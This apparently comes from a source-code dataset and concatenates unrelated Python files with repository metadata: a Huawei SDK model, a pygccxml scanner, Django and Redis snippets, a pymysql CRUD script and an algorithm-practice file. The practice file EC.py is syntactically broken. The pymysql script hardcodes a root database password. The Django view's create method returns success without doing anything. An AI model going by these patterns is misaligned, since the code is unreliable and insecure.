|
[
"Axel@Axel-Pc"
] |
Axel@Axel-Pc
|
bf1b684d24bbc4cf5a7179c2bf9f39cda4883aac
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-eihealth/huaweicloudsdkeihealth/v1/model/delete_nextflow_job_request.py
|
83b25425a82c6befc3917dc50bb320e6b8812723
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 4,327
|
py
|
# coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeleteNextflowJobRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'eihealth_project_id': 'str',
'job_id': 'str'
}
attribute_map = {
'eihealth_project_id': 'eihealth_project_id',
'job_id': 'job_id'
}
def __init__(self, eihealth_project_id=None, job_id=None):
"""DeleteNextflowJobRequest
The model defined in huaweicloud sdk
:param eihealth_project_id: 医疗智能体平台项目ID,您可以在EIHealth平台单击所需的项目名称,进入项目设置页面查看。
:type eihealth_project_id: str
:param job_id: 作业id
:type job_id: str
"""
self._eihealth_project_id = None
self._job_id = None
self.discriminator = None
self.eihealth_project_id = eihealth_project_id
self.job_id = job_id
@property
def eihealth_project_id(self):
"""Gets the eihealth_project_id of this DeleteNextflowJobRequest.
医疗智能体平台项目ID,您可以在EIHealth平台单击所需的项目名称,进入项目设置页面查看。
:return: The eihealth_project_id of this DeleteNextflowJobRequest.
:rtype: str
"""
return self._eihealth_project_id
@eihealth_project_id.setter
def eihealth_project_id(self, eihealth_project_id):
"""Sets the eihealth_project_id of this DeleteNextflowJobRequest.
医疗智能体平台项目ID,您可以在EIHealth平台单击所需的项目名称,进入项目设置页面查看。
:param eihealth_project_id: The eihealth_project_id of this DeleteNextflowJobRequest.
:type eihealth_project_id: str
"""
self._eihealth_project_id = eihealth_project_id
@property
def job_id(self):
"""Gets the job_id of this DeleteNextflowJobRequest.
作业id
:return: The job_id of this DeleteNextflowJobRequest.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this DeleteNextflowJobRequest.
作业id
:param job_id: The job_id of this DeleteNextflowJobRequest.
:type job_id: str
"""
self._job_id = job_id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeleteNextflowJobRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
574a978e3031c00ce0d37a59ee379800c4f2d854
|
a3b306df800059a5b74975793251a28b8a5f49c7
|
/Graphs/LX-2/molecule_otsu = False/BioImageXD-1.0/ITK/lib/InsightToolkit/WrapITK/Configuration/Languages/SwigInterface/pygccxml-1.0.0/pygccxml/parser/scanner.py
|
967c877a080cf5e421a7027aab7eb78b513ab7b5
|
[
"BSL-1.0"
] |
permissive
|
giacomo21/Image-analysis
|
dc17ba2b6eb53f48963fad931568576fda4e1349
|
ea8bafa073de5090bd8f83fb4f5ca16669d0211f
|
refs/heads/master
| 2016-09-06T21:42:13.530256
| 2013-07-22T09:35:56
| 2013-07-22T09:35:56
| 11,384,784
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,301
|
py
|
# Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import os
import types
import pprint
import xml.sax
import warnings
import xml.sax.handler
from pygccxml.declarations import *
from pygccxml import utils
##convention
#XML_NN - XML Node Name
#XML_AN - XML Attribute Name
#also those constants are sorted for easy searching.
XML_AN_ABSTRACT = "abstract"
XML_AN_ACCESS = "access"
XML_AN_ALIGN = "align"
XML_AN_ARTIFICIAL = "artificial"
XML_AN_ATTRIBUTES = "attributes"
XML_AN_BASE_TYPE = "basetype"
XML_AN_BASES = "bases"
XML_AN_BITS = "bits"
XML_AN_CONST = "const"
XML_AN_CONTEXT = "context"
XML_AN_CVS_REVISION = "cvs_revision"
XML_AN_DEFAULT = "default"
XML_AN_DEMANGLED = "demangled"
XML_AN_EXTERN = "extern"
XML_AN_FILE = "file"
XML_AN_ID = "id"
XML_AN_INCOMPLETE = "incomplete"
XML_AN_INIT = "init"
XML_AN_LINE = "line"
XML_AN_MANGLED = "mangled"
XML_AN_MAX = "max"
XML_AN_MEMBERS = "members"
XML_AN_MUTABLE = "mutable"
XML_AN_NAME = "name"
XML_AN_OFFSET = "offset"
XML_AN_PURE_VIRTUAL = "pure_virtual"
XML_AN_RESTRICT = "restrict"
XML_AN_RETURNS = "returns"
XML_AN_SIZE = "size"
XML_AN_STATIC = "static"
XML_AN_THROW = "throw"
XML_AN_TYPE = "type"
XML_AN_VIRTUAL = "virtual"
XML_AN_VOLATILE = "volatile"
XML_NN_ARGUMENT = "Argument"
XML_NN_ARRAY_TYPE = "ArrayType"
XML_NN_CASTING_OPERATOR = "Converter"
XML_NN_CLASS = "Class"
XML_NN_CONSTRUCTOR = "Constructor"
XML_NN_CV_QUALIFIED_TYPE = "CvQualifiedType"
XML_NN_DESTRUCTOR = "Destructor"
XML_NN_ELLIPSIS = "Ellipsis"
XML_NN_ENUMERATION = "Enumeration"
XML_NN_ENUMERATION_VALUE = "EnumValue"
XML_NN_FIELD = "Field"
XML_NN_FILE = "File"
XML_NN_FUNCTION = "Function"
XML_NN_FUNCTION_TYPE = "FunctionType"
XML_NN_FUNDAMENTAL_TYPE = "FundamentalType"
XML_NN_FREE_OPERATOR = "OperatorFunction"
XML_NN_GCC_XML = "GCC_XML"
XML_NN_MEMBER_OPERATOR = "OperatorMethod"
XML_NN_METHOD = "Method"
XML_NN_METHOD_TYPE = "MethodType"
XML_NN_NAMESPACE = "Namespace"
XML_NN_OFFSET_TYPE = "OffsetType"
XML_NN_POINTER_TYPE = "PointerType"
XML_NN_REFERENCE_TYPE = "ReferenceType"
XML_NN_ROOT = "GCC_XML"
XML_NN_STRUCT = "Struct"
XML_NN_TYPEDEF = "Typedef"
XML_NN_UNION = "Union"
XML_NN_VARIABLE = "Variable"
class scanner_t( xml.sax.handler.ContentHandler ):
def __init__(self, gccxml_file, decl_factory, *args ):
xml.sax.handler.ContentHandler.__init__(self, *args )
self.logger = utils.loggers.gccxml
self.gccxml_file = gccxml_file
#defining parsing tables
self.__readers = {
XML_NN_FILE : self.__read_file
, XML_NN_NAMESPACE : self.__read_namespace
, XML_NN_ENUMERATION : self.__read_enumeration
, XML_NN_ENUMERATION_VALUE : self.__read_enumeration_value
, XML_NN_ARRAY_TYPE : self.__read_array_type
, XML_NN_CV_QUALIFIED_TYPE : self.__read_cv_qualified_type
, XML_NN_POINTER_TYPE : self.__read_pointer_type
, XML_NN_REFERENCE_TYPE : self.__read_reference_type
, XML_NN_FUNDAMENTAL_TYPE : self.__read_fundamental_type
, XML_NN_ARGUMENT : self.__read_argument
, XML_NN_FUNCTION_TYPE : self.__read_function_type
, XML_NN_METHOD_TYPE : self.__read_method_type
, XML_NN_OFFSET_TYPE : self.__read_offset_type
, XML_NN_TYPEDEF : self.__read_typedef
, XML_NN_VARIABLE : self.__read_variable
, XML_NN_CLASS : self.__read_class
, XML_NN_STRUCT : self.__read_struct
, XML_NN_UNION : self.__read_union
, XML_NN_FIELD : self.__read_field
, XML_NN_CASTING_OPERATOR : self.__read_casting_operator
, XML_NN_CONSTRUCTOR : self.__read_constructor
, XML_NN_DESTRUCTOR : self.__read_destructor
, XML_NN_FUNCTION : self.__read_function
, XML_NN_FREE_OPERATOR : self.__read_free_operator
, XML_NN_MEMBER_OPERATOR : self.__read_member_operator
, XML_NN_METHOD : self.__read_method
, XML_NN_GCC_XML : self.__read_version
, XML_NN_ELLIPSIS : self.__read_ellipsis
}
self.deep_declarations = [
XML_NN_CASTING_OPERATOR
, XML_NN_CONSTRUCTOR
, XML_NN_DESTRUCTOR
, XML_NN_ENUMERATION
, XML_NN_FILE
, XML_NN_FUNCTION
, XML_NN_FREE_OPERATOR
, XML_NN_MEMBER_OPERATOR
, XML_NN_METHOD
, XML_NN_FUNCTION_TYPE
, XML_NN_METHOD_TYPE
]
assert isinstance( decl_factory, decl_factory_t )
self.__decl_factory = decl_factory
#mapping from id -> decl
self.__declarations = {}
#list of all read declarations
self.__calldefs = []
#list of enums I need later
self.__enums = []
#mapping from id -> type
self.__types = {}
#mapping from id -> file
self.__files = {}
#mapping between decl id -> access
self.__access = {}
#current object under construction
self.__inst = None
#mapping from id to members
self.__members = {}
self.__compiler = None
def read( self ):
xml.sax.parse( self.gccxml_file, self )
def endDocument( self ):
#updating membership
members_mapping = {}
for gccxml_id, members in self.__members.iteritems():
decl = self.__declarations.get( gccxml_id, None )
if not decl or not isinstance( decl, scopedef_t):
continue
members_mapping[ id( decl ) ] = members
self.__members = members_mapping
def declarations(self):
return self.__declarations
def calldefs( self ):
return self.__calldefs
def enums(self):
return self.__enums
def types(self):
return self.__types
def files(self):
return self.__files
def access(self):
return self.__access
def members(self):
return self.__members
def startElementNS(self, name, qname, attrs):
return self.startElement( name[1], attrs )
def endElementNS(self, name, qname):
return self.endElement( name[1] )
def startElement(self, name, attrs):
try:
if name not in self.__readers:
return
obj = self.__readers[name]( attrs )
if not obj:
return #it means that we worked on internals
#for example EnumValue of function argument
if name in self.deep_declarations:
self.__inst = obj
self.__read_access( attrs )
element_id = attrs.get(XML_AN_ID, None)
if isinstance( obj, declaration_t ):
obj.compiler = self.__compiler
self.__update_membership( attrs )
self.__declarations[ element_id ] = obj
if not isinstance( obj, namespace_t ):
self.__read_location( obj, attrs )
if isinstance( obj, class_t):
self.__read_bases( obj, attrs )
self.__read_artificial(obj, attrs)
self.__read_mangled( obj, attrs)
self.__read_demangled( obj, attrs)
self.__read_attributes(obj, attrs)
elif isinstance( obj, type_t ):
self.__types[ element_id ] = obj
self.__read_byte_size(obj, attrs)
self.__read_byte_align(obj, attrs)
elif isinstance( obj, types.StringTypes ):
self.__files[ element_id ] = obj
else:
self.logger.warning( 'Unknown object type has been found.'
+ ' Please report this bug to pygccxml development team.' )
except Exception, error:
msg = 'error occured, while parsing element with name "%s" and attrs "%s".'
msg = msg + os.linesep + 'Error: %s.' % str( error )
self.logger.error( msg % ( name, pprint.pformat( attrs.keys() ) ) )
raise
def endElement(self, name):
if name in self.deep_declarations:
self.__inst = None
def __read_location(self, decl, attrs):
decl.location = location_t( file_name=attrs[XML_AN_FILE], line=int(attrs[XML_AN_LINE]))
def __update_membership(self, attrs):
parent = attrs.get( XML_AN_CONTEXT, None )
if not parent:
return
if not self.__members.has_key( parent ):
self.__members[ parent ] = []
self.__members[parent].append( attrs[XML_AN_ID] )
def __read_members(self, decl, attrs ):
decl.declarations = attrs.get(XML_AN_MEMBERS, "")
def __read_bases(self, decl, attrs ):
decl.bases = attrs.get( XML_AN_BASES, "" )
def __read_artificial( self, decl, attrs ):
decl.is_artificial = attrs.get( XML_AN_ARTIFICIAL, False )
def __read_mangled( self, decl, attrs ):
decl.mangled = attrs.get( XML_AN_MANGLED, None )
def __read_demangled( self, decl, attrs ):
decl.demangled = attrs.get( XML_AN_DEMANGLED, None )
def __read_attributes( self, decl, attrs ):
decl.attributes = attrs.get( XML_AN_ATTRIBUTES, None )
def __read_access( self, attrs ):
self.__access[ attrs[XML_AN_ID] ] = attrs.get( XML_AN_ACCESS, ACCESS_TYPES.PUBLIC )
def __read_byte_size (self, decl, attrs):
"Using duck typing to set the size instead of in constructor"
size = attrs.get(XML_AN_SIZE, 0)
decl.byte_size = int(size)/8 # Make sure the size is in bytes instead of bits
def __read_byte_offset (self, decl, attrs):
"Using duck typing to set the offset instead of in constructor"
offset = attrs.get(XML_AN_OFFSET, 0)
decl.byte_offset = int(offset)/8 # Make sure the size is in bytes instead of bits
def __read_byte_align (self, decl, attrs):
"Using duck typing to set the alignment"
align = attrs.get(XML_AN_ALIGN, 0)
decl.byte_align = int(align)/8 # Make sure the size is in bytes instead of bits
def __read_root(self, attrs):
pass
def __read_file( self, attrs ):
return attrs.get( XML_AN_NAME, '' )
def __read_namespace(self, attrs):
ns_name = attrs.get( XML_AN_NAME, '' )
if '.' in ns_name:
#if '.' in namespace then this is mangled namespace -> in c++ namespace{...}
#that is almost true: gcc mangale name using top file name.
#almost all files has '.' in name
ns_name = ''
return self.__decl_factory.create_namespace( name=ns_name )
def __read_enumeration(self, attrs):
enum_name = attrs.get( XML_AN_NAME, '' )
if '$_' in enum_name or '._' in enum_name:
#it means that this is unnamed enum. in c++ enum{ x };
enum_name = ''
decl = self.__decl_factory.create_enumeration( name=enum_name )
self.__read_byte_size(decl, attrs)
self.__read_byte_align(decl, attrs)
self.__enums.append( decl )
return decl
def __read_enumeration_value( self, attrs ):
name = attrs.get( XML_AN_NAME, '' )
num = int(attrs[XML_AN_INIT])
self.__inst.append_value(name, num)
def __guess_int_value( self, value_as_str ):
#returns instance of int or None
#if gcc compiled the code, than it is correct!
numeric_suffix_letters = 'UuLlFf'
for s in numeric_suffix_letters:
value_as_str = value_as_str.replace( s, '' )
try:
return int( value_as_str )
except ValueError:
try:
return int( value_as_str, 16 )
except ValueError:
return None
def __read_array_type( self, attrs ):
type_ = attrs[ XML_AN_TYPE ]
size = self.__guess_int_value( attrs.get(XML_AN_MAX, '' ) )
if size is None:
size = array_t.SIZE_UNKNOWN
msg = 'unable to find out array size from expression "%s"' % attrs[ XML_AN_MAX ]
# warning is absolutely useless without much clue
# warnings.warn( msg )
return array_t( type_, size + 1 )
def __read_cv_qualified_type( self, attrs ):
if attrs.has_key( XML_AN_CONST ):
return const_t( attrs[XML_AN_TYPE] )
elif attrs.has_key( XML_AN_VOLATILE ):
return volatile_t( attrs[XML_AN_TYPE] )
elif attrs.has_key( XML_AN_RESTRICT ):
return restrict_t( attrs[XML_AN_TYPE] )
else:
assert 0
def __read_pointer_type( self, attrs ):
return pointer_t( attrs[XML_AN_TYPE] )
def __read_reference_type( self, attrs ):
return reference_t( attrs[XML_AN_TYPE] )
def __read_fundamental_type(self, attrs ):
try:
return FUNDAMENTAL_TYPES[ attrs.get( XML_AN_NAME, '' ) ]
except KeyError:
raise RuntimeError( "pygccxml error: unable to find fundamental type with name '%s'."
% attrs.get( XML_AN_NAME, '' ) )
def __read_offset_type( self,attrs ):
base = attrs[ XML_AN_BASE_TYPE ]
type_ = attrs[ XML_AN_TYPE ]
if '0.9' in self.__compiler:
return pointer_t( member_variable_type_t( class_inst=base, variable_type=type_ ) )
else:
return member_variable_type_t( class_inst=base, variable_type=type_ )
def __read_argument( self, attrs ):
if isinstance( self.__inst, calldef_type_t ):
self.__inst.arguments_types.append( attrs[XML_AN_TYPE] )
else:
argument = argument_t()
argument.name = attrs.get( XML_AN_NAME, 'arg%d' % len(self.__inst.arguments) )
argument.type = attrs[XML_AN_TYPE]
argument.default_value = attrs.get( XML_AN_DEFAULT, None )
self.__read_attributes( argument, attrs )
if argument.default_value == '<gccxml-cast-expr>':
argument.default_value = None
self.__inst.arguments.append( argument )
def __read_ellipsis( self, attrs ):
if isinstance( self.__inst, calldef_type_t ):
self.__inst.arguments_types.append( '...' )
else:
argument = argument_t( type='...' )
self.__inst.arguments.append( argument )
def __read_calldef( self, calldef, attrs, is_declaration ):
#destructor for example doesn't have return type
calldef.return_type = attrs.get( XML_AN_RETURNS, None )
if is_declaration:
self.__calldefs.append( calldef )
calldef.name = attrs.get(XML_AN_NAME, '')
calldef.has_extern = attrs.get( XML_AN_EXTERN, False )
throw_stmt = attrs.get( XML_AN_THROW, None )
if None is throw_stmt:
calldef.does_throw = True
calldef.exceptions = []
elif "" == throw_stmt:
calldef.does_throw = False
calldef.exceptions = []
else:
calldef.does_throw = True
calldef.exceptions = throw_stmt.split()
def __read_member_function( self, calldef, attrs, is_declaration ):
self.__read_calldef( calldef, attrs, is_declaration )
calldef.has_const = attrs.get( XML_AN_CONST, False )
if is_declaration:
calldef.has_static = attrs.get( XML_AN_STATIC, False )
if attrs.has_key( XML_AN_PURE_VIRTUAL ):
calldef.virtuality = VIRTUALITY_TYPES.PURE_VIRTUAL
elif attrs.has_key( XML_AN_VIRTUAL ):
calldef.virtuality = VIRTUALITY_TYPES.VIRTUAL
else:
calldef.virtuality = VIRTUALITY_TYPES.NOT_VIRTUAL
else:
calldef.class_inst = attrs[XML_AN_BASE_TYPE]
def __read_function_type(self, attrs):
answer = free_function_type_t()
self.__read_calldef( answer, attrs, False )
return answer
def __read_method_type(self, attrs):
answer = member_function_type_t()
self.__read_member_function( answer, attrs, False )
return answer
def __read_typedef(self, attrs ):
return self.__decl_factory.create_typedef( name=attrs.get( XML_AN_NAME, '' ), type=attrs[XML_AN_TYPE])
def __read_variable(self, attrs ):
type_qualifiers = type_qualifiers_t()
type_qualifiers.has_mutable = attrs.get(XML_AN_MUTABLE, False)
type_qualifiers.has_static = attrs.get(XML_AN_EXTERN, False)
bits = attrs.get( XML_AN_BITS, None )
if bits:
bits = int( bits )
decl = self.__decl_factory.create_variable( name=attrs.get( XML_AN_NAME, '' )
, type=attrs[XML_AN_TYPE]
, type_qualifiers=type_qualifiers
, value=attrs.get( XML_AN_INIT, None )
, bits=bits)
self.__read_byte_offset(decl, attrs)
return decl
__read_field = __read_variable #just a synonim
def __read_class_impl(self, class_type, attrs):
decl = None
name = attrs.get(XML_AN_NAME, '')
if '$' in name or '.' in name:
name = ''
if attrs.has_key( XML_AN_INCOMPLETE ):
decl = self.__decl_factory.create_class_declaration(name=name)
else:
decl = self.__decl_factory.create_class( name=name, class_type=class_type )
if attrs.get( XML_AN_ABSTRACT, False ):
decl.is_abstract = True
else:
decl.is_abstract = False
self.__read_byte_size(decl, attrs)
self.__read_byte_align(decl, attrs)
return decl
def __read_class( self, attrs ):
return self.__read_class_impl( CLASS_TYPES.CLASS, attrs )
def __read_struct( self, attrs ):
return self.__read_class_impl( CLASS_TYPES.STRUCT, attrs )
def __read_union( self, attrs ):
return self.__read_class_impl( CLASS_TYPES.UNION, attrs )
def __read_casting_operator(self, attrs ):
operator = self.__decl_factory.create_casting_operator()
self.__read_member_function( operator, attrs, True )
return operator
def __read_constructor( self, attrs ):
constructor = self.__decl_factory.create_constructor()
self.__read_member_function( constructor, attrs, True )
return constructor
def __read_function(self, attrs):
gfunction = self.__decl_factory.create_free_function()
self.__read_calldef( gfunction, attrs, True )
return gfunction
def __read_method(self, attrs):
mfunction = self.__decl_factory.create_member_function()
self.__read_member_function( mfunction, attrs, True )
return mfunction
def __read_destructor(self, attrs):
destructor = self.__decl_factory.create_destructor()
self.__read_member_function( destructor, attrs, True )
destructor.name = '~' + destructor.name
return destructor
def __read_free_operator(self, attrs ):
operator = self.__decl_factory.create_free_operator()
self.__read_member_function( operator, attrs, True )
if 'new' in operator.name or 'delete' in operator.name:
operator.name = 'operator ' + operator.name
else:
operator.name = 'operator' + operator.name
return operator
def __read_member_operator(self, attrs):
operator = self.__decl_factory.create_member_operator()
self.__read_member_function( operator, attrs, True )
if 'new' in operator.name or 'delete' in operator.name:
operator.name = 'operator ' + operator.name
else:
operator.name = 'operator' + operator.name
return operator
def __read_version(self, attrs):
logger = utils.loggers.cxx_parser
version = float( attrs.get(XML_AN_CVS_REVISION, 0.6) )
if version is None:
logger.info ( 'GCCXML version - 0.6' )
self.__compiler = compilers.GCC_XML_06
elif version <= 1.114:
logger.info ( 'GCCXML version - 0.7' )
self.__compiler = compilers.GCC_XML_07
elif version in ( 1.115, 1.116, 1.117, 1.118, 1.119, 1.120, 1.121 ):
logger.info ( 'GCCXML version - 0.9 BUGGY' )
self.__compiler = compilers.GCC_XML_09_BUGGY
else:
logger.info ( 'GCCXML version - 0.9' )
self.__compiler = compilers.GCC_XML_09
|
[
"fede.anne95@hotmail.it"
] |
fede.anne95@hotmail.it
|
7e5bdb95eceb8d543706dd352ce4101905da500f
|
95c71453ed6cc6f9b94f38a3c1655680618d71a4
|
/kickstart/DE/EC.py
|
477f7b6f874fc7fe1f0ee7f7bd160a909212de3b
|
[] |
no_license
|
ZX1209/gl-algorithm-practise
|
95f4d6627c1dbaf2b70be90149d897f003f9cb3a
|
dd0a1c92414e12d82053c3df981897e975063bb8
|
refs/heads/master
| 2020-05-16T14:56:34.568878
| 2019-12-27T07:37:11
| 2019-12-27T07:37:11
| 183,116,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
from collections import Counter
def isOdd(n):
return n % 2
def sortl(ls):
sums = Counter()
tmpl = []
for i in range(len(ls)):
sums[i] = sum(ls[i])
for i, j in sums.most_common():
tmpl.append(ls[i])
return tmpl
def rate(lhu,lla):
win = 0
total = 0
for hu in lhu:
for la in lla:
total += 1
if hu>la:
win+=1
return wi
def dfs()
# la win >=
# hu win >
def solve_EC(N, hu, la):
lla = [sum(la[i:i+N]) for i in range(N)]
win = 0
lla.sort()
hu.sort()
while
for i in range(3*N):
if hu[i] > la[i]:
win += 1
return win/(3*N)
def main():
T = int(input())
for t in range(T):
tmp = input().split()
tmp = list(map(int, tmp))
N, = tmp
tmp = input().split()
tmp = list(map(int, tmp))
hu = tmp
tmp = input().split()
tmp = list(map(int, tmp))
la = tmp
print('Case #' + str(t + 1) + ': ', end='')
print(solve_EC(N, hu, la))
if __name__ == '__main__':
main()
|
[
"1404919041@qq.com"
] |
1404919041@qq.com
|
cdd78006ece1d3fe85d569ed5cd2713d6c9d3dc0
|
b5abb217826b531c8f4c24c74df5620cf89234e0
|
/tutorial/quickstart/views/wavsViews.py
|
96d52c59b977477927374207b08abe16e53cc95d
|
[] |
no_license
|
zhwj2015/speech
|
bedf80c2842b3c344cd1932ba22b71ecaddb84dc
|
5155a45b088acaca6988e910927197e2da71f556
|
refs/heads/master
| 2016-09-06T09:53:05.564149
| 2015-07-08T00:14:27
| 2015-07-08T00:14:27
| 37,200,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,167
|
py
|
__author__ = 'Administor'
from rest_framework import viewsets
from tutorial.quickstart.models import Wavs, Users
from tutorial.quickstart.serializers import WavsSerializer
from rest_framework.response import Response
import os
from rest_framework.renderers import JSONRenderer
from django.utils.six import BytesIO
from rest_framework.parsers import JSONParser
from tutorial.quickstart.util import Util, JSONResponse
class WavsViews(viewsets.ModelViewSet):
queryset = Wavs.objects.all()
serializer_class = WavsSerializer
def create(self, request, *args, **kwargs):
try:
pass
# filename = request.data['wavs'].name
# suffix=filename[filename.find('.'):]
# name = Util.getTimestamp()
# filename = str(name)+str(suffix)
# path = 'wavs/'+filename
# user_id = request.data['uid']
# user = Users.objects.all().get(user_id=user_id)
# created = request.data['created']
# created = Util.strToTime(created,'%Y-%m-%d')
#
# if not os.path.exists('wavs/'):
# os.makedirs('wavs/')
# out = open(path, 'wb+')
# infile = request.data['wavs']
# for chunk in infile.chunks():
# out.write(chunk)
# out.flush()
# out.close()
# wav = Wavs(wav_id=name, name=filename, path=path, user_id=user, created=created, score=0)
# serializer = WavsSerializer(wav)
# json = JSONRenderer().render(serializer.data)
# stream = BytesIO(json)
# data = JSONParser().parse(stream)
# serializer = WavsSerializer(data=data)
# #object to JSON
# # data = Util.serializeToJSON(serializer)
# #
# # serializer = WavsSerializer(data=data)
# if serializer.is_valid():
# wav.save()
# else:
# return JSONResponse({'status': False})
except Exception, e:
print "error"
return JSONResponse({'status': False})
return JSONResponse({'status': True})
|
[
"1654339276@qq.com"
] |
1654339276@qq.com
|
4450e3282bc9a86c113545d0d5972bb6830b3915
|
25176b716df2bd519703c6e3cbc761d1b8b192c1
|
/src/app/interfaces/redis.py
|
a5133a0dc8d716666dec6fb805c35b0bedf27523
|
[] |
no_license
|
kain-jy/python-clean-architecture
|
74521d411b1d53f007e80e74c8abe5c64591d321
|
a5365818026a6b4da47dae64b099c1de5c8b5005
|
refs/heads/master
| 2020-04-21T00:03:13.797032
| 2019-02-05T03:22:24
| 2019-02-05T03:24:26
| 169,184,834
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
import json
import redis
from .. import usecases
class UserRedisRepository(usecases.UserRepository):
def __init__(self, url):
self.client = redis.from_url(url, decode_responses=True)
def list_user(self):
ret = []
for k in self.client.keys('user:*'):
user = usecases.load_user(json.loads(self.client.get(k)))
ret.append(user)
return ret
def find_user(self, user_id):
payload = self.client.get('user:{}'.format(user_id))
if not payload:
return None
return usecases.load_user(json.loads(payload))
def upsert_user(self, user):
self.client.set("user:{}".format(user.id), json.dumps(user.dump()))
def delete_user(self, user):
self.client.delete("user:{}".format(user.id))
|
[
"me@kain-jy.com"
] |
me@kain-jy.com
|
2a09d365cb4047774eb081599078201fca564efa
|
4d8cfbfe6498d0808eefa8983b07940e006c49fb
|
/ges/forms.py
|
7da85805e7e5201851422ce41a3674ddf51edaf3
|
[] |
no_license
|
nikolzp/ges_google
|
4b7d18e4fa039a0d4b21e5d71b2a249df958ed2b
|
fe89f150a624411867877491f127d71eff92bfc9
|
refs/heads/master
| 2020-03-12T00:59:24.072648
| 2018-04-20T14:43:38
| 2018-04-20T14:43:38
| 130,363,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
from django import forms
class GesFilterForm(forms.Form):
max_power = forms.IntegerField(label='Мощность от МВт', required=False)
min_power = forms.IntegerField(label='Мощность до МВт', required=False)
max_area = forms.IntegerField(label='Объем от кв.км', required=False)
min_area = forms.IntegerField(label='Объем до кв.км', required=False)
|
[
"nikolzp@gmail.com"
] |
nikolzp@gmail.com
|
8c5c25cee31f3dd1e619b8efc727a8ddf6ab0d55
|
0a3a67da5fe86829b61518827b104e82a887f8a9
|
/Create_Insert_Read_Update.py
|
fbe88c5990a7e7e04aad81215131e7f6927f9e75
|
[] |
no_license
|
heeba14/Database_Programing
|
080f50520bc24a1d3c1d8791614c90dc27ea449a
|
b995db179d3edf471429f7d7f0e465392534e02d
|
refs/heads/master
| 2021-04-29T22:53:36.891819
| 2018-02-24T18:09:29
| 2018-02-24T18:09:29
| 121,646,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,547
|
py
|
import pymysql
db = pymysql.connect("localhost", "root", "mysql123", "python")
"""Create Table"""
def create_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
#cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
sql = """CREATE TABLE Number (
FIRST_NAME TEXT NOT NULL,
LAST_NAME TEXT,
AGE INT )"""
cursor.execute(sql)
#db.close()
"""Insert Table"""
def insert_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = """INSERT INTO Profile(FIRST_NAME,
LAST_NAME, AGE)
VALUES ('Heeba', 'Kawoosa', 24)"""
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
#db.close()
""" Read Table """
def read_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = '''SELECT * FROM Profile'''
try:
cursor.execute(sql)
results = cursor.fetchall()
print(results)
except:
print("Error: unable to fetch data")
#db.close()
""" Update Table """
def update_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = """UPDATE Profile SET AGE = AGE -1
WHERE First_name = 'Heeba'"""
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
#db.close()
create_table()
insert_table()
read_table()
update_table()
db.close()
|
[
"heebakawoos93@gmail.com"
] |
heebakawoos93@gmail.com
|
26f47532449dbed8b39096a83f8cc42ae7de4c34
|
4dbe3b1b2af3ff77e8086ec32ab58dcf47849a3e
|
/tests/__init__.py
|
50530a34b837af8bd1a04e3a510f33988b96846e
|
[
"MIT"
] |
permissive
|
mnpk/dynamo3
|
b83dc700345972ea2336ac8ca842fd9f23edf5c2
|
51eacee60bdf8d058831a9ab3583a2cfe9f91ca9
|
refs/heads/master
| 2021-01-16T21:54:32.089114
| 2016-04-30T00:53:55
| 2016-04-30T00:53:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,985
|
py
|
""" Tests for Dynamo3 """
from __future__ import unicode_literals
import six
from botocore.exceptions import ClientError
from decimal import Decimal
from mock import patch, MagicMock, ANY
from six.moves.cPickle import dumps, loads # pylint: disable=F0401,E0611
from six.moves.urllib.parse import urlparse # pylint: disable=F0401,E0611
from dynamo3 import (DynamoDBConnection, Binary, DynamoKey, Dynamizer, STRING,
ThroughputException, Table, GlobalIndex, DynamoDBError,
Limit)
